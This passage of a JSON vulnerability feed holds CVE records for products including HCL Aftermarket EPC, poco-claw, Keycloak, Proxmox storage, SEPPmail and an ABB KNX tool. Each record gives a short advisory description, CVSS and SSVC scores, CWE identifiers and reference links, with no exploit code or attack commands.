1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:20:37.313469Z","id":"CVE-2024-23574","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-204"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23575","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:17.810","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attack since the application returns detailed error messages that leak information about the processing on the server. An attacker may use the contents of error messages to help launch another ,more focused attack."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:19:09.401392Z","id":"CVE-2024-23575","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-209"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23577","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:17.947","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable since the application does not have a validation for HOST header and accepts arbitrary hosts when requested in http protocol. When an application doesn’t adequately validate or sanitize this header, it can lead to several security risks, including Host header poisoning, server misconfigurations."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:21:09.649438Z","id":"CVE-2024-23577","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23578","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:18.063","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attack as the application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain (*-Wildcard)."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N","baseScore":4.2,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:22:44.385315Z","id":"CVE-2024-23578","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-942"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-42214","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:18.863","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attack since HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that are supported by the Web server which allows an attacker to narrow and intensify their efforts."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:20:04.055235Z","id":"CVE-2024-42214","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-692"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2025-60357","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T14:17:19.003","lastModified":"2026-07-17T18:47:13.683","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"AhnLab EPP Management v1.0.14.32-6249 was discovered to contain a NoSQL injection vulnerability via the eventlog/agentEvent/list endpoint."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:47:32.978361Z","id":"CVE-2025-60357","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-943"}]}],"references":[{"url":"https://ahnlab.com","source":"cve@mitre.org"},{"url":"https://github.com/Nullbyte3117/CVE-2025-60357","source":"cve@mitre.org"},{"url":"https://github.com/Nullbyte3117/CVE-2025-60357","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-16015","sourceIdentifier":"cna@vuldb.com","published":"2026-07-17T14:17:21.517","lastModified":"2026-07-17T19:17:12.860","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was determined in poco-ai poco-claw up to 0.5.4. This vulnerability affects the function create_task of the file executor_manager/app/api/v1/tasks.py of the component executor_manager API. Executing a manipulation can lead to missing authentication. The exploit has been publicly disclosed and may be utilized. Upgrading to version 0.5.7 is able to resolve this issue. This patch is called 67fcc88505c57f77d3fcf04eb5b89425b10cbf48. It is recommended to upgrade the affected component."}],"affected":[{"source":"cna@vuldb.com","affectedData":[{"vendor":"poco-ai","product":"poco-claw","cpes":["cpe:2.3:a:poco-ai:poco-claw:*:*:*:*:*:*:*:*"],"modules":["executor_manager API"],"versions":[{"version":"0.5.0","status":"affected"},{"version":"0.5.1","status":"affected"},{"version":"0.5.2","status":"affected"},{"version":"0.5.3","status":"affected"},{"version":"0.5.4","status":"affected"},{"version":"0.5.7","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.1,"baseSeverity":"LOW","attackVector":"ADJACENT","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:A/AC:L/Au:N/C:P/I:P/A:P","baseScore":5.8,"accessVector":"ADJACENT_NETWORK","accessComplexity":"LOW","authentication":"NONE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"MEDIUM","exploitabilityScore":6.5,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:27:54.707853Z","id":"CVE-2026-16015","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Secondary","description":[{"lang":"en","value":"CWE-287"},{"lang":"en","value":"CWE-306"}]}],"references":[{"url":"https://github.com/poco-ai/poco-claw/","source":"cna@vuldb.com"},{"url":"https://github.com/poco-ai/poco-claw/commit/67fcc88505c57f77d3fcf04eb5b89425b10cbf48","source":"cna@vuldb.com"},{"url":"https://github.com/poco-ai/poco-claw/issues/136","source":"cna@vuldb.com"},{"url":"https://github.com/poco-ai/poco-claw/issues/137","source":"cna@vuldb.com"},{"url":"https://github.com/poco-ai/poco-claw/pull/135","source":"cna@vuldb.com"},{"url":"https://github.com/poco-ai/poco-claw/releases/tag/0.5.7","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-16015","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/856812","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/856813","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/856815","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/856816","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379757","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379757/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-16016","sourceIdentifier":"cna@vuldb.com","published":"2026-07-17T14:17:21.697","lastModified":"2026-07-17T16:17:14.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was identified in poco-ai poco-claw up to 0.5.4. This issue affects the function run_task of the file executor/app/api/v1/task.py. The manipulation of the argument callback_url leads to server-side request forgery. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The reported GitHub issue was closed automatically due to inactivity."}],"affected":[{"source":"cna@vuldb.com","affectedData":[{"vendor":"poco-ai","product":"poco-claw","cpes":["cpe:2.3:a:poco-ai:poco-claw:*:*:*:*:*:*:*:*"],"versions":[{"version":"0.5.0","status":"affected"},{"version":"0.5.1","status":"affected"},{"version":"0.5.2","status":"affected"},{"version":"0.5.3","status":"affected"},{"version":"0.5.4","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:N/C:P/I:P/A:P","baseScore":7.5,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"NONE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"HIGH","exploitabilityScore":10.0,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:51:15.201300Z","id":"CVE-2026-16016","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/poco-ai/poco-claw/","source":"cna@vuldb.com"},{"url":"https://github.com/poco-ai/poco-claw/issues/138","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-16016","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/856814","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379758","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379758/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-16072","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T14:17:21.860","lastModified":"2026-07-17T19:17:12.990","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in the organization management component of Keycloak. A delegated administrator with permission to manage organizations can create an invitation for a non-existent email address and then retrieve the secret registration link directly through the application programming interface. By using this link, the administrator can create new user accounts and add them to the organization without having the required user management permissions or access to the invited email account. This allows an administrator to bypass security boundaries and add unauthorized members to an organization."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 7","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N","baseScore":4.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:27:33.028934Z","id":"CVE-2026-16072","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-16072","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501721","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-51080","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T14:17:24.270","lastModified":"2026-07-17T18:47:13.683","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"libpvestorage-perl v9.1.1 and libpve-storage-perl v8.3.7 were discovered to contain an XML External Entity (XXE) vulnerability."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:54:51.178660Z","id":"CVE-2026-51080","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-611"}]}],"references":[{"url":"https://forum.proxmox.com/threads/proxmox-virtual-environment-security-advisories.149331/post-849970","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-9592","sourceIdentifier":"vulnerability@ncsc.ch","published":"2026-07-17T14:17:27.657","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"SEPPmail Secure Email Gateway & SEPPmail Cloud before version 15.0.4.2 allows an attacker to replay & hijack a user session in the GINA web portal, as the session token is disclosed inside the URL and a HTTP header."}],"affected":[{"source":"vulnerability@ncsc.ch","affectedData":[{"vendor":"SEPPmail","product":"SEPPmail Secure Email Gateway & SEPPmail Cloud","defaultStatus":"unaffected","platforms":["Windows","Linux","Android","ARM","32 bit","iOS","MacOS","x86","64 bit"],"versions":[{"version":"15.0.4.2","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"vulnerability@ncsc.ch","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"ADJACENT","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"UNREPORTED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:24:33.801613Z","id":"CVE-2026-9592","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"vulnerability@ncsc.ch","type":"Secondary","description":[{"lang":"en","value":"CWE-598"}]}],"references":[{"url":"https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#remove-login-redirect-to-prevent-disclosure-of-session-token-information","source":"vulnerability@ncsc.ch"}]}},{"cve":{"id":"CVE-2026-12705","sourceIdentifier":"cybersecurity@ch.abb.com","published":"2026-07-17T15:16:45.890","lastModified":"2026-07-17T18:10:29.780","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Missing support for integrity check vulnerability in ABB KNX Update Tool (ABB), ABB KNX Update Tool (BJE).\n\nThis issue affects KNX Update Tool (ABB): through 2.0.175; KNX Update Tool (BJE): through 2.0.175."}],"affected":[{"source":"cybersecurity@ch.abb.com","affectedData":[{"vendor":"ABB","product":"KNX Update Tool (ABB)","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"2.0.175","versionType":"custom","status":"affected"}]},{"vendor":"ABB","product":"KNX Update Tool (BJE)","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"2.0.175","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"cybersecurity@ch.abb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"ADJACENT","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cybersecurity@ch.abb.com","type":"Secondary","c